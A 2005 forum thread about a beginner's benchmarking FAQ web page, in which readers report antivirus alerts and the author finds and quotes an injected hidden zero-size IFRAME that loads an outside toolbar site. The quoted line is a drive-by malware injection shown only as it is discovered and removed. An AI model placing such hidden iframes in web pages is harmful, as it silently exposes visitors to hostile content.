I have been working on this on and (mainly) off for 2 months now. College is about to start up this coming Tuesday so I thought I should release what I have of this now. I fired up Frontpage and just threw up a very simple (56K User friendly) design.
This is my Benchmark F.A.Q. Eventually it'll contain everything a novice would need to know about benchmarking. It's still rough and I still have a lot to add to it, but it contains a lot of info which I think will benefit people. I hope you all like it and find it useful. Without further delay, click below to see it. The Benchmark F.A.Q. - Version 0.1a Change Log: 0.1a - Removed mysterious viral code. Should no longer harass people now. Sorry for inconvenience.0.1 - Initial Release (Eww )

It probably just got lost amongst other concurrent threads the first time, or mistaken for a news post about an FAQ elsewhere.
Glanced over it and all seems informative and well written.A tiny suggestion about the 2.0.7 bottleneck point, to somehow stress that the bottleneck of a system varies in between applications. While that is also made pretty clear elsewhere it is something that many freshmen benchmarkers don't realise right away. HD Tach can be found here: http://www.simplisoftware.com/Public...request=HdTach While it is not a tool that a hyper serious review site like Storagereview.com uses to test drives it still has some use in that it gives off low level performance numbers that can be useful for troubleshooting as much as a rough performance test. |

Yeah, it's a good tool and I was gonna throw it in, but amongst the lack of feedback, I got discouraged and didn't go on with it. It's been sitting on the back of my To Do list amongst other things in my life. I hope to update it at least once (a major update) by the end of the year. Thanks for the kind words, all

Well, where is it?
It's gone! Where? How?! Why!?!
Never mind... Could you just put it back so that I (probably someone else as well) could read it? Thanx! |

Thank you, No Style!
Nice work! Rather basic, but, for anyone new to benching, quite useful.

What virus scanner? This FAQ was made with FrontPage 2003..and should not contain any "viral content" I'm using SAV10 and it doesn't pick up a thing.

Shut it down quick, it's absolutely virus riddled. AntiVir is going ballistic on my screen LOL. Looks as though someone doesnt appreciate your work. Bastards.
Edit: Just tried it again for you and im getting 13 popups and trojan attempts. New Edit: Problem resolved link is clean. Last edited by Lelisevis; Jun 19, 2005 at 09:03 PM. |

Indeed, same here.. I use McAfee 2005 and kept coming up with pop-ups.. As soon as i closed your site, it stopped.
Hopefully you find what is causing it.

Alright. I'll take it down and investigate this.. Thanks, all.
Update: I tried it with Opera, nothing. Tried it with IE/Maxthon, blamo SAV10 was going ballastic. What the deuce, indeed. Update 1: Somebody added this: Code:
<IFRAME SRC=http://www.crazy-toolbar.com/home/w3bmoney/ WIDTH=0 BORDER=0 HEIGHT=0></IFRAME> ![]() I appologize for not believing you in the first place. I was using Opera and it did not harass me.

Try refreshing the page. Because I removed that line. I'm still curious as to how it got there

I did it
, but I'm shure that the page is stored in my server, I mean my ISP is a linux server providing me and other clients internet service, but the owner uses the 80 Gb hard drive as the cache for better web browsing, so the virus is there ![]() anyway keep making such a good work kind regards
